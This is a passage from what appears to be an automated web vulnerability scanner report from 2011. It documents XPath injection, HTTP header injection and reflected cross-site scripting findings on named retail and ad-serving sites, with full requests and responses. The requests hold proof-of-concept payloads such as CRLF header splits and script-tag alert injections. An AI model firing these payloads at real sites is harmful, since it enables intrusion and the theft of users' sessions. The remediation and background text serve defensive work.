Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.6. http://community.petco.com/discussions/Social_Applications_Polls/fd03p00v00apoll [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/discussions/Social_Applications_Polls/fd03p00v00apoll

Issue detail

Request

GET /discussions/Social_Applications_Polls/fd03p00v00apoll?args=tid:LATEST;&widgetId=PTWidget1&cdsn=95&config=mspPolls0001'&pttv=2&includeCSS=false&nav=mspPolls HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; ChameleonForumId10166=2010169:fd03p00sitez

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10894

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.7. http://community.petco.com/n/blogs/blog.aspx [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/n/blogs/blog.aspx

Issue detail

Request

GET /n/blogs/blog.aspx?webtag=fd03p00v00b1&widgetId=PTWidget0&pttv=2&nav=widget&config=recentBlogPosts0001'&includeCSS=false&cdsn=282 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11034

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

3.8. http://community.petco.com/n/pfx/forum.aspx [config parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.petco.com
Path:	/n/pfx/forum.aspx

Issue detail

Request

GET /n/pfx/forum.aspx?webtag=fd03p00v01d1&widgetId=PTWidget2&pttv=2&nav=widget&config=recentDiscussions0001'&includeCSS=false&cdsn=568 HTTP/1.1
Host: community.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; ChameleonForumId10166=2010169:fd03p00sitez; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 02:01:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11033

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +113
MS.Internal.Xml.XPath.XPathScanner.NextLex() +440
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +113
MS.Internal.Xml.XPath.XPathParser.
...[SNIP]...

4. HTTP header injection previous next
There are 2 instances of this issue:

/RealMedia/ads/adstream.cap/123 [c parameter]
/RealMedia/ads/adstream.cap/123 [va parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload e5eb5%0d%0abd0c019c16 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=e5eb5%0d%0abd0c019c16&va=1&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: e5eb5
bd0c019c16=1; expires=Wed, 15-Jun-11 02:02:03 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

4.2. http://ads.traderonline.com/RealMedia/ads/adstream.cap/123 [va parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream.cap/123

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79b52%0d%0abc60156776a was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap/123?c=ForrentCriteo&va=79b52%0d%0abc60156776a&e=30d HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712812%26pt1%3D0%26pt2%3D1&t1=sendEvent&p=2633&c=2&cb=47490119328
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ForrentCriteo=1; NSC_d17efm_qppm_iuuq=ffffffff09419e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 02:02:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: ForrentCriteo=79b52
bc60156776a; expires=Wed, 15-Jun-11 02:02:10 GMT; path=/; domain=.traderonline.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

5. Cross-site scripting (reflected) previous next
There are 76 instances of this issue:

http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]
http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter]
http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]
http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter]
http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx [u parameter]
http://hire.jobvite.com/CompanyJobs/Careers.aspx [name of an arbitrarily supplied request parameter]
http://html.aggregateknowledge.com/iframe [wid parameter]
http://images3.pacsun.com/is/image/pacsun/AC_close_052110 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/FSO_041911 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/brand_logo016 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/brand_logo017 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/btnASmallV3 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/btn_searchGo_v2 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/detailLogo_301 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/detailLogo_391 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/headerEmailV3_envelope [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/homePromo1_051211 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/homePromo2_051311 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/logo_v3 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_arrivals3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_brands3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_collective3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_mens3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_sale3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_shoes3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_surf3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_swim3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/mainNav2_womens3Off [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/newPromo_042811 [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/redesign_social [REST URL parameter 4]
http://images3.pacsun.com/is/image/pacsun/spacer [REST URL parameter 4]
http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard [mbox parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://px.steelhousemedia.com/pr [get_px parameter]
http://px.steelhousemedia.com/pr [name of an arbitrarily supplied request parameter]
http://px.steelhousemedia.com/pr [prov_id parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
https://secure.bhphotovideo.com/bnh/controller/home [O parameter]
https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]
https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]
http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://sv.liveclicker.net/service/api [var parameter]
http://t.p.mybuys.com/webrec/wr.do [ckc parameter]
http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]
http://www.acehardware.com/category/index.jsp [clickid parameter]
http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]
http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]
http://www.acehardware.com/home/index.jsp [rdir parameter]
http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]
http://www.bhphotovideo.com/c/buy/Camcorders-Housings/ci/16479/N/4267396714 [REST URL parameter 5]
http://www.bluenile.com/build-your-own-diamond-ring [name of an arbitrarily supplied request parameter]
http://www.footlocker.com/login/login.cfm [bv_AA_enabled parameter]
http://www.footlocker.com/login/login.cfm [bv_RR_enabled parameter]
http://www.footlocker.com/login/login_forgotpassword.cfm [bv_AA_enabled parameter]
http://www.footlocker.com/login/login_form.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000121)%3C/script%3E parameter]
http://www.footlocker.com/login/login_form.cfm [bv_AA_enabled parameter]
http://www.footlocker.com/login/login_form.cfm [name of an arbitrarily supplied request parameter]
http://www.gnc.com/community/index.jsp%20%20 [name of an arbitrarily supplied request parameter]
http://www.gnc.com/home/index.jsp [c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91 parameter]
http://www.gnc.com/home/index.jsp [name of an arbitrarily supplied request parameter]
https://www.gnc.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]
http://www.petsmart.com/ [name of an arbitrarily supplied request parameter]
http://www.petsmart.com/ [rdir parameter]
https://www.petsmart.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]
http://www.redcrossstore.org/Shopper/Product.aspx [UniqueItemId parameter]
http://www.toshibadirect.com/td/b2c/laptops.to [name of an arbitrarily supplied request parameter]
http://www.toshibadirect.com/td/b2c/laptops.to [page parameter]
http://www.acehardware.com/category/index.jsp [Referer HTTP header]
http://www.acehardware.com/home/index.jsp [Referer HTTP header]
http://www.gnc.com/home/index.jsp [Referer HTTP header]
http://www.footlocker.com/login/login_form.cfm [TID cookie]
http://www.petco.com/ [ResonanceSegment cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 19f96<script>alert(1)</script>8320cd70653 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 16 May 2011 01:57:59 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/68433919f96<script>alert(1)</script>8320cd70653

5.2. http://buy.travelguard.com/TGI2/proc/stateselector.aspx [br parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/TGI2/proc/stateselector.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c35a'%3balert(1)//bd29db8f83c was submitted in the br parameter. This input was echoed as 9c35a';alert(1)//bd29db8f83c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a'%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329 HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:40:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
State Selector
</title><link hre
...[SNIP]...
<IFRAME SRC="' + document.location.protocol + '//fls.doubleclick.net/activityi;src=1774243;type=trave806;cat=trave548;u3=tgdirect9c35a';alert(1)//bd29db8f83c;u4=' + scStoreArc + ';u8=' + hbxStoreType + ';u9=Live;ord=1;num=' + a + '?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

5.3. http://buy.travelguard.com/tgi2/proc/error.aspx [br parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://buy.travelguard.com
Path:	/tgi2/proc/error.aspx

Issue detail

The value of the br request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e96a0'%3balert(1)//af8feb44cf2 was submitted in the br parameter. This input was echoed as e96a0';alert(1)//af8feb44cf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /tgi2/proc/error.aspx?pcode=MYTG&br=e96a0'%3balert(1)//af8feb44cf2&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329&st=1&cn=1&errorID=uh HTTP/1.1
Host: buy.travelguard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect9c35a%27%3balert(1)//bd29db8f83c&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
Cookie: s_sess=%20s_cc%3Dtrue%3B%20gvo_s_eVar17%3Dclc-001-DualCTACruise-Feb19-ComMTG-SBSRight%3B%20SC_LINKS%3Dundefined%253A/TGI2/proc/stateselector.aspx%255E%255E/tgi2/app_themes/default/img/buttons/continue.gif%255E%255Eundefined%253A/TGI2/proc/stateselector.aspx%2520%257C%2520/tgi2/app_themes/default/img/buttons/continue.gif%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dundefined%2525253A/TGI2/proc/stateselector.aspx%252526pidt%25253D1%252526oid%25253Djavascript%2525253AWebForm_DoPostBackWithOptions%25252528new%2525252520WebForm_PostBackOptions%25252528%25252522ctl00%25252524ctl00%25252524purchasePathCont%252526ot%25253DA%3B; s_pers=%20s_depth%3D2%7C1305546099515%3B%20gpv_pageName%3Dundefined%253A/TGI2/proc/stateselector.aspx%7C1305546114553%3B%20s_pers_prop21%3D000329%7C1463224314554%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:12:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Error Page
</title><link href="/
...[SNIP]...
